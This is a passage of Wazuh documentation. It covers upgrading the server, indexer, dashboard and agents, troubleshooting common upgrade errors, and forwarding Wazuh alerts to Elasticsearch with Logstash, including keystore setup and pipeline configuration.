    1. Ensure the <indexer> block contains the details of your Wazuh indexer host. During the upgrade, a default <indexer> configuration is added under <ossec_conf> if none exists in /var/ossec/etc/ossec.conf. By default, the configuration includes one host with the IP address 0.0.0.0:

      <indexer>
         <enabled>yes</enabled>
         <hosts>
            <host>https://0.0.0.0:9200</host>
         </hosts>
         <ssl>
            <certificate_authorities>
               <ca>/etc/filebeat/certs/root-ca.pem</ca>
            </certificate_authorities>
            <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
            <key>/etc/filebeat/certs/filebeat-key.pem</key>
         </ssl>
      </indexer>
      

      Replace 0.0.0.0 with the IP address or hostname of your Wazuh indexer node. You can find this value in the Filebeat configuration file at /etc/filebeat/filebeat.yml. Ensure that the <certificate> and <key> names match the files located in /etc/filebeat/certs/.

    2. If using a Wazuh indexer cluster, add a <host> entry in the Wazuh manager /var/ossec/etc/ossec.conf file for each node in the cluster. For example, for a two-node configuration:

      <hosts>
         <host>https://10.0.0.1:9200</host>
         <host>https://10.0.0.2:9200</host>
      </hosts>
      

      The Wazuh server will prioritize reporting to the first indexer node in the list and switch to the next available node if it becomes unavailable.

  3. Store Wazuh indexer credentials

    Save the Wazuh indexer username and password into the Wazuh manager keystore using the Wazuh-keystore tool:

    # echo '<INDEXER_USERNAME>' | /var/ossec/bin/wazuh-keystore -f indexer -k username
    # echo '<INDEXER_PASSWORD>' | /var/ossec/bin/wazuh-keystore -f indexer -k password
    

    If you have forgotten your Wazuh indexer password, refer to the password management guide to reset it.

  4. Restart the Wazuh manager to apply the configuration changes

    # systemctl restart wazuh-manager
    
Configuring Filebeat

When upgrading Wazuh, you must also update the Wazuh Filebeat module and the alerts template to ensure compatibility with the latest Wazuh indexer version. Follow these steps to configure Filebeat properly:

  1. Download the Wazuh module for Filebeat:

    # curl -s https://packages.wazuh.com/5.x/filebeat/wazuh-filebeat-0.5.tar.gz | sudo tar -xvz -C /usr/share/filebeat/module
    
  2. Download the alerts template:

    # curl -so /etc/filebeat/wazuh-template.json https://raw.githubusercontent.com/wazuh/wazuh/v5.0.0/extensions/elasticsearch/7.x/wazuh-template.json
    # chmod go+r /etc/filebeat/wazuh-template.json
    
  3. Backup the /etc/filebeat/filebeat.yml file to preserve your custom Filebeat configuration settings. Create a copy of the file using the following command:

    # cp /etc/filebeat/filebeat.yml  /etc/filebeat/filebeat.yml.old
    
  4. Upgrade Filebeat to the latest version:

    # yum upgrade filebeat
    
  5. Restore your custom Filebeat configuration settings:

    # cp /etc/filebeat/filebeat.yml.old  /etc/filebeat/filebeat.yml
    
  6. Restart Filebeat:

    # systemctl daemon-reload
    # systemctl enable filebeat
    # systemctl start filebeat
    
  7. Upload the new Wazuh template and pipelines for Filebeat:

    # filebeat setup --pipelines
    # filebeat setup --index-management -E output.logstash.enabled=false
    
  8. If you are upgrading from Wazuh versions v4.8.x or v4.9.x, manually update the wazuh-states-vulnerabilities-* mappings using the following command. Replace <WAZUH_INDEXER_IP_ADDRESS>, <USERNAME>, and <PASSWORD> with the values applicable to your deployment.

    Skip this step if upgrading from other versions.

    curl -X PUT "https://<WAZUH_INDEXER_IP_ADDRESS>:9200/wazuh-states-vulnerabilities-*/_mapping"  -u <USERNAME> -k -H 'Content-Type: application/json' -d'
    {
      "properties": {
        "vulnerability": {
          "properties": {
            "under_evaluation": {
              "type": "boolean"
            },
            "scanner": {
              "properties": {
                "source": {
                  "type": "keyword",
                  "ignore_above": 1024
                }
              }
            }
          }
        }
      }
    }
    '
    
Upgrading the Wazuh dashboard

Backup the /etc/wazuh-dashboard/opensearch_dashboards.yml file to save your settings. For example, create a copy of the file using the following command:

# cp /etc/wazuh-dashboard/opensearch_dashboards.yml /etc/wazuh-dashboard/opensearch_dashboards.yml.old
  1. Upgrade the Wazuh dashboard.

    # yum upgrade wazuh-dashboard
    
  2. Manually reapply any configuration changes to the /etc/wazuh-dashboard/opensearch_dashboards.yml file. Ensure that the values of server.ssl.key and server.ssl.certificate match the files located in /etc/wazuh-dashboard/certs/.

  3. Ensure the value of uiSettings.overrides.defaultRoute in the /etc/wazuh-dashboard/opensearch_dashboards.yml file is set to /app/wz-home as shown below:

    uiSettings.overrides.defaultRoute: /app/wz-home
    
  4. Restart the Wazuh dashboard:

    # systemctl daemon-reload
    # systemctl enable wazuh-dashboard
    # systemctl start wazuh-dashboard
    

    You can now access the Wazuh dashboard via: https://<DASHBOARD_IP_ADDRESS>/app/wz-home.

  5. Import the saved customizations exported while preparing the upgrade.

    1. Navigate to Dashboard management > Dashboard Management > Saved objects on the Wazuh dashboard.

    2. Click Import, add the ndjson file and click Import.

Note

Note that the upgrade process doesn't update plugins installed manually. Outdated plugins might cause the upgrade to fail.

  1. Run the following command on the Wazuh dashboard server to list installed plugins and identify those that require an update:

    # sudo -u wazuh-dashboard /usr/share/wazuh-dashboard/bin/opensearch-dashboards-plugin list
    

    In the output, plugins that require an update will be labeled as "outdated".

  2. Remove the outdated plugins and reinstall the latest version replacing <PLUGIN_NAME> with the name of the plugin:

    # sudo -u wazuh-dashboard /usr/share/wazuh-dashboard/bin/opensearch-dashboards-plugin remove <PLUGIN_NAME>
    # sudo -u wazuh-dashboard /usr/share/wazuh-dashboard/bin/opensearch-dashboards-plugin install <PLUGIN_NAME>
    
Next steps

The Wazuh server, indexer, and dashboard are now successfully upgraded. You can verify the versions by running the following commands on the node(s) where the central components are installed:

# yum list installed wazuh-indexer
# yum list installed wazuh-manager
# yum list installed wazuh-dashboard

Next, upgrade the Wazuh agents by following the instructions in Upgrading the Wazuh agent.

Wazuh agent

The following sections include instructions to upgrade the Wazuh agent to the latest available version. It is possible to upgrade the Wazuh agents either remotely from the Wazuh manager or locally.

For remote upgrades, you can use either the Wazuh manager (agent_upgrade tool) or the Wazuh API (via the Wazuh dashboard or a command-line tool). For details, refer to the Remote agent upgrade section.

To perform the upgrade locally, select your operating system and follow the instructions.

Upgrading Wazuh agents on Linux endpoints

Select your package manager and follow the instructions to upgrade the Wazuh agent locally.

Note

You need root user privileges to run all the commands described below.

  1. Install the GPG key.

    # curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | gpg --no-default-keyring --keyring gnupg-ring:/usr/share/keyrings/wazuh.gpg --import && chmod 644 /usr/share/keyrings/wazuh.gpg
    
  2. Add the Wazuh repository.

    # echo "deb [signed-by=/usr/share/keyrings/wazuh.gpg] https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
    
  3. Upgrade the Wazuh agent to the latest version.

    # apt-get update
    # apt-get install wazuh-agent
    
  4. It is recommended to disable the Wazuh repository in order to avoid undesired upgrades and compatibility issues as the Wazuh agent should always be in the same or an older version than the Wazuh manager. Skip this step if the package is set to a hold state.

    # sed -i "s/^deb/#deb/" /etc/apt/sources.list.d/wazuh.list
    # apt-get update
    

Note

For Debian 7, 8, and Ubuntu 14 systems import the GCP key and add the Wazuh repository (steps 1 and 2) using the following commands.

# apt-get install gnupg apt-transport-https
# curl -s https://packages.wazuh.com/key/GPG-KEY-WAZUH | apt-key add -
# echo "deb https://packages.wazuh.com/5.x/apt/ stable main" | tee -a /etc/apt/sources.list.d/wazuh.list
Upgrading Wazuh agents on Windows endpoints

Follow these steps to upgrade Wazuh agents locally on Windows endpoints.

Note

You need administrator privileges to upgrade the agent.

  1. Download the latest Windows installer.

  2. Run the Windows installer by using the command line interface (CLI) or the graphical user interface (GUI).

    To upgrade the Wazuh agent from the command line, run the installer using Windows PowerShell or the command prompt. The /q argument is used for unattended installations.

    # .\wazuh-agent-5.0.0-1.msi /q
    
Upgrading Wazuh agents on macOS endpoints

Follow these steps to upgrade Wazuh agents locally on macOS endpoints.

Note

You need administrator privileges to upgrade the agent.

  1. Download the latest macOS installer:

  2. Run the macOS installer by using the command line interface (CLI) or the graphical user interface (GUI).

    To upgrade the Wazuh agent by using the command line, select your architecture, and run the installer:

    # installer -pkg wazuh-agent-5.0.0-1.intel64.pkg -target /
    

Troubleshooting

This section contains common issues that might occur when upgrading the Wazuh central components and provides steps to resolve them.

Wazuh-DB backup restoration

Wazuh by default performs automatic backups of the global.db database. These snapshots may be useful to recover critical information such as agent keys, agent synchronization information, and FIM event data among others. Wazuh-DB will restore the last backup available in case of failure during the upgrade. If this process also fails, the restoration must be done manually.

Manual restoration process
  1. Stop the Wazuh manager.

    # systemctl stop wazuh-manager
    
  2. Locate the backup to restore. It is stored in /var/ossec/backup/db/ with a name format similar to global.db-backup-TIMESTAMP-pre_upgrade.gz.

    Note

    This process is valid for all the backups in the folder. Snapshot names containing the special tag pre_upgrade were created right before upgrading the Wazuh server. Any other snapshot is a periodic backup created according to the backup setting.

  3. Decompress the backup file. Always use the -k flag to preserve the original file:

    # gzip -dk WAZUH_HOME/backup/db/global.db-backup-TIMESTAMP-pre_upgrade.gz
    
  4. Remove the current global.db database and move the backup to the right location:

    # rm  WAZUH_HOME/queue/db/global.db
    # mv  WAZUH_HOME/backup/db/global.db-backup-TIMESTAMP-pre_upgrade WAZUH_HOME/queue/db/global.db
    
  5. Start the Wazuh manager.

    # systemctl start wazuh-manager
    
Wazuh dashboard server is not ready yet

This message typically appears right after starting or restarting the Wazuh dashboard. However, it may also indicate one of the following issues:

  • The Wazuh dashboard service is encountering an error and repeatedly restarting.

  • The Wazuh dashboard cannot communicate with the Wazuh indexer.

  • The Wazuh indexer service is not running or has encountered an error.

Steps to diagnose and fix the issue
  1. Ensure the Wazuh dashboard service is active. Run the following command on the Wazuh dashboard node to check the status:

    # systemctl status wazuh-dashboard
    
  2. Check the Wazuh dashboard logs for errors. Run the following command on the Wazuh dashboard node:

    # journalctl -u wazuh-dashboard | grep -i -E "error|warn"
    
  3. Ensure the Wazuh dashboard is correctly configured to communicate with the Wazuh indexer. Open the dashboard /etc/wazuh-dashboard/opensearch_dashboards.yml file and verify the Wazuh indexer IP address configured in the opensearch.hosts field:

    opensearch.hosts: https://<WAZUH_INDEXER_IP_ADDRESS>:9200
    
  4. Check the connectivity between the Wazuh dashboard and the Wazuh indexer. Replace <WAZUH_INDEXER_IP_ADDRESS> and run the following command on the Wazuh dashboard node:

    # curl -v telnet://<WAZUH_INDEXER_IP_ADDRESS>:9200
    
  5. Ensure the Wazuh indexer service is active. Run the following command on the Wazuh indexer node to check the status:

    # systemctl status wazuh-indexer
    

    If the service is down, investigate potential errors.

  6. Replace <WAZUH_INDEXER_CLUSTER_NAME> and run the following command on the Wazuh indexer node to check the indexer logs for errors:

    # cat /var/log/wazuh-indexer/<WAZUH_INDEXER_CLUSTER_NAME>.log | grep -E "ERROR|WARN|Caused"
    
The 'vulnerability-detector' configuration is deprecated

This warning occurs because upgrading the Wazuh manager does not modify the /var/ossec/etc/ossec.conf file, preserving the previous Wazuh Vulnerability Detection module configuration. Additionally, warnings about invalid configurations for interval, min_full_scan_interval, run_on_start and provider elements may appear. To resolve these issues, update the configuration as outlined in Configuration.

No username and password found in the keystore

To ensure alerts and vulnerabilities are indexed and displayed on the Wazuh dashboard, add indexer credentials to the manager keystore.

Run the following commands to store the credentials securely:

# echo '<INDEXER_USERNAME>' | /var/ossec/bin/wazuh-keystore -f indexer -k username
# echo '<INDEXER_PASSWORD>' | /var/ossec/bin/wazuh-keystore -f indexer -k password

If you've forgotten your Wazuh indexer password, refer to the password management guide to reset it.

IndexerConnector initialization failed

This warning may indicate incorrect keystore credentials, a configuration issue, or a certificate error. Verify that the IP address, port, and certificate paths are correctly configured in the <indexer> section of /var/ossec/etc/ossec.conf.

After resolving the issue and successfully connecting the Wazuh manager to the indexer, you should see a log like this:

INFO: IndexerConnector initialized successfully for index: ...

If the error persists, enable wazuh_modules.debug=2 temporarily in /var/ossec/etc/local_internal_options.conf for more details.

Vulnerability detection seems to be disabled or has a problem

This warning suggests that the Wazuh Vulnerability Detection module might be disabled or misconfigured. To troubleshoot, follow these steps:

  1. Ensure the vulnerability-detection module is enabled in /var/ossec/etc/ossec.conf.

  2. Locate the <indexer> block in /var/ossec/etc/ossec.conf and confirm there are no misconfigurations or duplicate <indexer> sections.

  3. Verify the wazuh-states-vulnerabilities-* index is correctly created. Ensure it is present and its health status is green by navigating to Indexer Management > Index Management > Indexes on the Wazuh dashboard.

  4. If the index wasn’t created, check the Wazuh manager logs for errors or warnings using the following command:

    # cat /var/ossec/logs/ossec.log | grep -i -E "error|warn"
    
Application Not Found

If you see the message Application Not Found when accessing the Wazuh dashboard after upgrading, it may be because the configuration file /etc/wazuh-dashboard/opensearch_dashboards.yml wasn’t updated with the latest changes.

To fix this issue, update the uiSettings.overrides.defaultRoute setting in the /etc/wazuh-dashboard/opensearch_dashboards.yml file to the following value:

uiSettings.overrides.defaultRoute: /app/wz-home
SSO issue when upgrading from Wazuh 4.8 and earlier

If upgrading from Wazuh 4.8 or earlier, update the exchange_key value in /etc/wazuh-indexer/opensearch-security/config.yml.

Previously, exchange_key was set by copying the X.509 Certificate blob, excluding the -----BEGIN CERTIFICATE----- and -----END CERTIFICATE----- lines.

Starting with Wazuh 4.9.0, exchange_key must be a 64-character random alphanumeric string.

For guidance, refer to the first step of the Wazuh indexer configuration in the Single sign-on (SSO) guides for platforms like Okta, Microsoft Entra ID, PingOne, Google, Jumpcloud, OneLogin, and Keycloack.

None of the above solutions are fixing my problem

We have a welcoming community ready to assist with most Wazuh deployment and usage issues. Visit any of the Wazuh community channels for support.

You can also report issues directly on our GitHub repositories under the Wazuh organization.

When reporting a problem, include detailed information such as the version, operating system, and relevant logs to help us assist you effectively.

Integrations guide: Elastic, OpenSearch, Splunk, Amazon Security Lake

Wazuh offers extensive compatibility and robust integration features that allow users to connect it with other security solutions and platforms. Integrating Wazuh with other security solutions enables users to manage Wazuh data in diverse ways.

Elastic, OpenSearch, and Splunk are software platforms designed for search, analytics, and data management. They are used to collect, index, search, and analyze large volumes of data in real-time and historical contexts.

Amazon Security Lake is a service designed to help organizations collect, manage, and analyze security data from various sources. Its primary purpose is to centralize security data, making it easier to detect, investigate, and respond to security threats.

Up to Wazuh v4.5, the following integrated applications allow users to manage Wazuh and its security data using third-party platforms:

However, from version 4.6, we will not develop these integrated applications any longer. We will only support them with critical security updates. In this document, we describe new methods of integrating your Wazuh deployment with the following third-party security platforms:

Integration methods

We describe how to configure the following integration alternatives for each of the security platforms mentioned above:

  • Wazuh indexer integration

  • Wazuh server integration

Additionally, we demonstrate how to import the provided dashboards for these platforms.

Wazuh indexer integration

The Wazuh agent collects security data from monitored endpoints. These data are analyzed by the Wazuh server and indexed in the Wazuh indexer. The Wazuh indexer integration forwards analyzed security data from the Wazuh indexer to the third-party security platform indexer in the form of indexes. Indexes are collections of documents with similar properties.

Wazuh indexer integration requires a running Wazuh indexer and uses Logstash as a data forwarder for forwarding alerts to a third-party security platform. Logstash forwards the alerts generated after querying the Wazuh indexer. This integration requires that you install Logstash on a dedicated server or on the server hosting the third-party indexer.

We recommend the Wazuh indexer integration if you want to continue analyzing security data in Wazuh and archive it in a data lake for storage or out-of-band analysis. The Wazuh indexer and third-party platform indexer both create indexes for the same alerts. This integration results in the redundancy of indexes which can lead to high resource costs.

Wazuh server integration

The Wazuh agent collects security data from monitored endpoints. The Wazuh server analyzes the data and generates alerts on the Wazuh dashboard. Wazuh stores security alerts locally in the /var/ossec/logs/alerts/alerts.log and /var/ossec/logs/alerts/alerts.json alerts files. The Wazuh server integration operates by reading the /var/ossec/logs/alerts/alerts.json file and forwarding the alerts to the third-party platform using a data forwarder.

We recommend Wazuh server integration over indexer integration if you don’t have enough resources for hosting both the third-party security platform indexer and the Wazuh indexer. This is particularly relevant for users operating Wazuh at a large scale, generating numerous alerts.

To implement the Wazuh server integration, a data forwarder must be installed on the same system as the Wazuh server. In multi-node configurations, the data forwarder should be installed on each Wazuh server node.

Note

To make sure Wazuh logs the alerts to /var/ossec/logs/alerts/alerts.json, check that the jsonout_output option in the Wazuh server configuration /var/ossec/etc/ossec.conf file is set to yes.

Integration considerations

Data forwarders

Third-party security platforms typically have a dedicated data collector or data forwarder which is required for implementing these integrations. These forwarders facilitate the data flow from the Wazuh indexer or server to the third-party security platforms.

In the Wazuh indexer integration alternative, the forwarder executes periodic queries to the Wazuh indexer. These queries are performed in blocks, with the time range of each query matching the specified query period. Consequently, there may be a delay in the arrival of alerts at the destination, depending on the frequency set for querying new alerts.

In the Wazuh server integration, the forwarder periodically checks the Wazuh alerts file. If it detects changes since the last read, it loads all the new alerts and sends them to the third-party platform.

Similarly, checking for new alerts periodically means that the alerts reach the destination with a delay. This delay depends on the frequency established to check for new alerts.

We discuss the data forwarders that we use in the integration alternatives.

There are several ways to ingest data into third-party indexers, which include using content sources, Elastic Agent, Beats, or Logstash. Each method has different trade-offs and use cases. In this documentation, we consider only Logstash and Splunk Forwarder and explain our considerations.

Logstash

Elastic Logstash is a free and open server-side data processing pipeline that ingests data from multiple sources, transforms it, and then sends it to your desired destination. Logstash has an Apache 2.0 license base and non-open source extensions under the x-pack denomination. Logstash supports scheduling queries at intervals of up to a second.

Logstash supports reading data from indexes using an input plugin and supports transformations with an output plugin. In summary, Logstash is the most compatible data forwarder for the Wazuh indexer and server integrations.

Splunk Forwarder

Splunk forwarder is a powerful data collection and forwarding tool provided by Splunk. It serves as an agent that collects data from various sources, transforms it if necessary, and sends it to the Splunk indexing infrastructure for further analysis and visualization.

The Splunk forwarder supports data collection from diverse sources such as log files, metrics, network devices, and APIs. It provides robust mechanisms to parse, filter, and enrich the collected data before sending it to the Splunk indexers. This enables users to extract relevant information, apply custom formatting, and enhance the data's overall quality and usefulness.

Redistributable dashboards

In this guide you can find configuration steps to set your integration and use the dashboards we provide for third-party security platforms. These dashboards help you get insights from your security data using these platforms.

Capacity planning

When integrating Wazuh with other security solutions, you need to carefully plan your storage resources and escalation needs beforehand. While the details on capacity planning are out of the scope of this guide, here are a few considerations.

When using the Wazuh indexer integration, you need to put the following points into consideration:

  • The disk space available on the third-party endpoint.

  • The network bandwidth the third-party indexer needs to ingest the collected data.

  • The network bandwidth the data forwarder uses to forward the security data.

  • The scalability of the data forwarder infrastructure to read all the data from the Wazuh indexer and forward it to the third-party security platform.

When using the Wazuh server integration, you need to put the following points into consideration:

  • The disk space each Wazuh server must have to forward the data.

  • The network bandwidth the Wazuh server and the third-party security platform need to receive and forward the security data respectively.

  • The additional CPU/RAM resources the data forwarder requires to work.

  • The disk space on the destination platform to accommodate the forwarded data it receives.

After the integration, you might have the same data in both Wazuh and third-party security platforms. To minimize the amount of duplicated data, you can archive the data from the Wazuh server or indexer for storage or later analysis. Also, you need to plan backups and recovery of data in case of failure.

Elastic Stack integration

Elasticsearch is the central component of the Elastic Stack, (commonly referred to as the ELK Stack - Elasticsearch, Logstash, and Kibana), which is a set of free and open tools for data ingestion, enrichment, storage, analysis, and visualization.

In this guide, you can find out how to integrate Wazuh with Elastic in the following ways:

Wazuh indexer integration using Logstash

Perform all the steps described below on your Logstash server. You must install Logstash on a dedicated server or on the server hosting the third-party indexer. We performed the steps on a Linux operating system. Logstash forwards the data from the Wazuh indexer to Elasticsearch in the form of indexes.

Learn more about the Wazuh indexer integration and its necessary considerations.

Installing Logstash

Perform the following steps to install Logstash and the required plugin.

  1. Follow the Elastic documentation to install Logstash. Ensure that you consider the requirements and performance tuning guidelines for running Logstash.

    Note

    Ensure all components of your ELK (Elasticsearch, Logstash, and Kibana) stack are the same version to avoid compatibility issues.

  2. Run the following command to install the logstash-input-opensearch plugin. This plugin reads data from the Wazuh indexer into the Logstash pipeline.

    $ sudo /usr/share/logstash/bin/logstash-plugin install logstash-input-opensearch
    
  3. Copy the Wazuh indexer and Elasticsearch root certificates to the Logstash server.

    Note

    You can add the certificates to any directory of your choice. For example, we added them in /etc/logstash/wazuh-indexer-certs and /etc/logstash/elasticsearch-certs respectively.

  4. Give the logstash user the necessary permissions to read the copied certificates:

    $ sudo chmod -R 755 </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem
    $ sudo chmod -R 755 </PATH/TO/LOCAL/ELASTICSEARCH/CERTIFICATE>/root-ca.pem
    

    Replace </PATH/TO/LOCAL/WAZUH_INDEXER/CERTIFICATE>/root-ca.pem and </PATH/TO/LOCAL/ELASTICSEARCH/CERTIFICATE>/root-ca.pem with your Wazuh indexer and Elasticsearch certificate local paths on the Logstash endpoint respectively.

Configuring new indexes

You must define the mappings between the data and the index types to ensure Elasticsearch indexes your data correctly. Elasticsearch can infer these mappings, but we recommend that you explicitly configure them. Wazuh provides a set of mappings to ensure Elasticsearch indexes the data correctly.

You need to use the logstash/es_template.json template to configure this index initialization for your Elasticsearch platform. The refresh_interval is set to 5s in the template we provide.

Create a /etc/logstash/templates/ directory and download the template as wazuh.json using the following commands:

$ sudo mkdir /etc/logstash/templates
$ sudo curl -o /etc/logstash/templates/wazuh.json https://packages.wazuh.com/integrations/elastic/4.x-8.x/dashboards/wz-es-4.x-8.x-template.json

In Elasticsearch, the indexes support up to 1000 fields by default. However, Wazuh logs might contain even more than this number of fields. To solve this issue, the provided wazuh.json template has the fields set to 10000 by default as shown below:

...
"template": {
  ...
  "settings": {
        ...
        "mapping": {
         "total_fields": {
            "limit": 10000
         }
        }
        ...
  }
  ...
}
...

You can further increase this value by following the creating an index template documentation.

Configuring a pipeline

A Logstash pipeline allows Logstash to use plugins to read the data from the Wazuh indexes and send them to Elasticsearch.

The Logstash pipeline requires access to the following secret values:

  • Wazuh indexer credentials

  • Elasticsearch credentials

We use the Logstash keystore to securely store these values.

  1. Run the following commands on your Logstash server to set a keystore password:

    $ set +o history
    $ echo 'LOGSTASH_KEYSTORE_PASS="<MY_KEYSTORE_PASSWORD>"'| sudo tee /etc/sysconfig/logstash
    $ export LOGSTASH_KEYSTORE_PASS=<MY_KEYSTORE_PASSWORD>
    $ set -o history
    $ sudo chown root /etc/sysconfig/logstash
    $ sudo chmod 600 /etc/sysconfig/logstash
    $ sudo systemctl start logstash
    

    Where <MY_KEYSTORE_PASSWORD> is your keystore password.

    Note

    You need to create the /etc/sysconfig folder if it does not exist on your server.

  2. Run the following commands to securely store the credentials of the Wazuh indexer and Elasticsearch in the Logstash keystore.

    Note

    When you run each of the commands, you will be prompted to enter your credentials and the credentials will not be visible as you enter them.

    ELASTICSEARCH_USERNAME, ELASTICSEARCH_PASSWORD, WAZUH_INDEXER_USERNAME, and WAZUH_INDEXER_PASSWORD are keys representing the secret values you are adding to the Logstash keystore. These keys will be used in the Logstash pipeline.

    1. Create a new Logstash keystore:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash create
      
    2. Store your Elasticsearch username and password:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add ELASTICSEARCH_USERNAME
      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add ELASTICSEARCH_PASSWORD
      
    3. Store your Wazuh indexer administrator username and password:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add WAZUH_INDEXER_USERNAME
      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash add WAZUH_INDEXER_PASSWORD
      

    Where:

    • ELASTICSEARCH_USERNAME and ELASTICSEARCH_PASSWORD are keys representing your Elasticsearch username and password respectively.

    • WAZUH_INDEXER_USERNAME and WAZUH_INDEXER_PASSWORD are keys representing your Wazuh indexer administrator username and password respectively.

  3. Perform the following steps to configure the Logstash pipeline.

    1. Create the configuration file wazuh-elasticsearch.conf in /etc/logstash/conf.d/ folder:

      $ sudo touch /etc/logstash/conf.d/wazuh-elasticsearch.conf
      
    2. Add the following configuration to the wazuh-elasticsearch.conf file. This sets the parameters required to run Logstash.

      input {
        opensearch {
         hosts =>  ["<WAZUH_INDEXER_ADDRESS>:9200"]
         user  =>  "${WAZUH_INDEXER_USERNAME}"
         password  =>  "${WAZUH_INDEXER_PASSWORD}"
         index =>  "wazuh-alerts-4.x-*"
         ssl => true
         ca_file => "</PATH/TO/LOCAL/WAZUH_INDEXER>/root-ca.pem"
         query =>  '{
             "query": {
                "range": {
                   "@timestamp": {
                      "gt": "now-1m"
                   }
                }
             }
         }'
         schedule => "* * * * *"
        }
      }
      
      output {
          elasticsearch {
               hosts => "<ELASTICSEARCH_ADDRESS>"
               index  => "wazuh-alerts-4.x-%{+YYYY.MM.dd}"
               user => '${ELASTICSEARCH_USERNAME}'
               password => '${ELASTICSEARCH_PASSWORD}'
               ssl => true
               cacert => "</PATH/TO/LOCAL/ELASTICSEARCH>/root-ca.pem"
               template => "/etc/logstash/templates/wazuh.json"
               template_name => "wazuh"
               template_overwrite => true
          }
      }
      

      Where:

      • <WAZUH_INDEXER_ADDRESS> is your Wazuh indexer address or addresses in case of cluster deployment.

      • <ELASTICSEARCH_ADDRESS> is your Elasticsearch IP address.

      • </PATH/TO/LOCAL/WAZUH_INDEXER>/root-ca.pem is your Wazuh indexer certificate local path on the Logstash server. For example, you can use /etc/logstash/wazuh-indexer-certs/root-ca.pem which is the Wazuh indexer root certificate that was copied earlier.

      • </PATH/TO/LOCAL/ELASTICSEARCH>/root-ca.pem is your Elasticsearch certificate local path on the Logstash server. For example, you can use /etc/logstash/elasticsearch-certs/root-ca.pem which is the Elasticsearch certificate that was copied earlier.

      Note

      For testing purposes, you can avoid SSL verification by replacing cacert => "</PATH/TO/LOCAL/ELASTICSEARCH>/root-ca.pem" with ssl_certificate_verification => false.

      If you are using composable index templates and the _index_template API, set the optional parameter legacy_template => false.

Running Logstash
  1. Once you have everything set, run Logstash from CLI with your configuration:

    $ sudo systemctl stop logstash
    $ sudo -E /usr/share/logstash/bin/logstash -f /etc/logstash/conf.d/wazuh-elasticsearch.conf --path.settings /etc/logstash/
    

    Make sure to use your own paths for the executable, the pipeline, and the configuration files.

    Ensure that Wazuh indexer RESTful API port (9200) is open on your Wazuh indexer. To verify that the necessary ports for Wazuh component communication are open, refer to the list of required ports.

  2. After confirming that the configuration loads correctly without errors, cancel the command and run Logstash as a service. This way Logstash is not dependent on the lifecycle of the terminal it's running on. You can now enable and run Logstash as a service:

    $ sudo systemctl enable logstash.service
    $ sudo systemctl start logstash.service
    

Check Elastic documentation for more details on setting up and running Logstash.

Note

Any data indexed before the configuration is complete will not be forwarded to the Elastic indexes.

The /var/log/logstash/logstash-plain.log file in the Logstash instance stores events generated when Logstash runs. View this file in case you need to troubleshoot.

After Logstash is successfully running, check how to configure the Wazuh alert index pattern and verify the integration.

Wazuh server integration using Logstash

Perform all the steps below on your Wazuh server. Learn more about the Wazuh server integration and its necessary considerations.

Installing Logstash

We use Logstash to forward security data in the /var/ossec/logs/alerts/alerts.json alerts file from the Wazuh server to the Elasticsearch indexes.

Perform the following steps to install Logstash and the required plugin.

  1. Follow the Elastic documentation to install Logstash. Ensure that you consider the requirements and performance tuning guidelines for running Logstash.

    Note

    Ensure all components of your ELK (Elasticsearch, Logstash, and Kibana) stack are the same version to avoid compatibility issues.

  2. Run the following command to install the logstash-output-elasticsearch plugin. This plugin allows Logstash to write data into Elasticsearch.

    $ sudo /usr/share/logstash/bin/logstash-plugin install logstash-output-elasticsearch
    
  3. Copy the Elasticsearch root certificate to the Wazuh server. You can add the certificate to any directory of your choice. In our case, we add it in /etc/logstash/elasticsearch-certs directory.

  4. Give the logstash user the necessary permissions to read the copied certificates:

    $ sudo chmod -R 755 </PATH/TO/LOCAL/ELASTICSEARCH/CERTIFICATE>/root-ca.pem
    

    Replace </PATH/TO/LOCAL/ELASTICSEARCH/CERTIFICATE>/root-ca.pem with your Elasticsearch certificate local path on the Wazuh server.

Configuring new indexes

You must define the mappings between the data and the index types to ensure Elasticsearch indexes your data correctly. Elasticsearch can infer these mappings, but we recommend that you explicitly configure them. Wazuh provides a set of mappings to ensure Elasticsearch indexes the data correctly.

You need to use the logstash/es_template.json template to configure this index initialization for your Elasticsearch platform. The refresh_interval is set to 5s in the template we provide.

Create a /etc/logstash/templates/ directory and download the template as wazuh.json using the following commands:

$ sudo mkdir /etc/logstash/templates
$ sudo curl -o /etc/logstash/templates/wazuh.json https://packages.wazuh.com/integrations/elastic/4.x-8.x/dashboards/wz-es-4.x-8.x-template.json

In Elasticsearch, the indexes support up to 1000 fields by default. However, Wazuh logs might contain even more than this number of fields. To solve this issue, the provided wazuh.json template has the fields set to 10000 by default as shown below:

...
"template": {
  ...
  "settings": {
        ...
        "mapping": {
         "total_fields": {
            "limit": 10000
         }
        }
        ...
  }
  ...
}
...

You can further increase this value by following the creating an index template documentation.

Configuring a pipeline

A Logstash pipeline allows Logstash to use plugins to read the data in the Wazuh /var/ossec/logs/alerts/alerts.json alert file and send them to Elasticsearch.

The Logstash pipeline requires access to your Elasticsearch credentials.

We use the Logstash keystore to securely store these values.

  1. Run the following commands on your Logstash server to set a keystore password:

    $ set +o history
    $ echo 'LOGSTASH_KEYSTORE_PASS="<MY_KEYSTORE_PASSWORD>"'| sudo tee /etc/sysconfig/logstash
    $ export LOGSTASH_KEYSTORE_PASS=<MY_KEYSTORE_PASSWORD>
    $ set -o history
    $ sudo chown root /etc/sysconfig/logstash
    $ sudo chmod 600 /etc/sysconfig/logstash
    $ sudo systemctl start logstash
    

    Where <MY_KEYSTORE_PASSWORD> is your keystore password.

    Note

    You need to create the /etc/sysconfig folder if it does not exist on your server.

  2. Run the following commands to securely store the credentials of Elasticsearch.

    Note

    When you run each of the commands, you will be prompted to enter your credentials and the credentials will not be visible as you enter them.

    ELASTICSEARCH_USERNAME and ELASTICSEARCH_PASSWORD are keys representing the secret values you are adding to the Logstash keystore. These keys will be used in the Logstash pipeline.

    1. Create a new Logstash keystore:

      $ sudo -E /usr/share/logstash/bin/logstash-keystore --path.settings /etc/logstash create
      
    2. Store your Elasticsearch username and password:

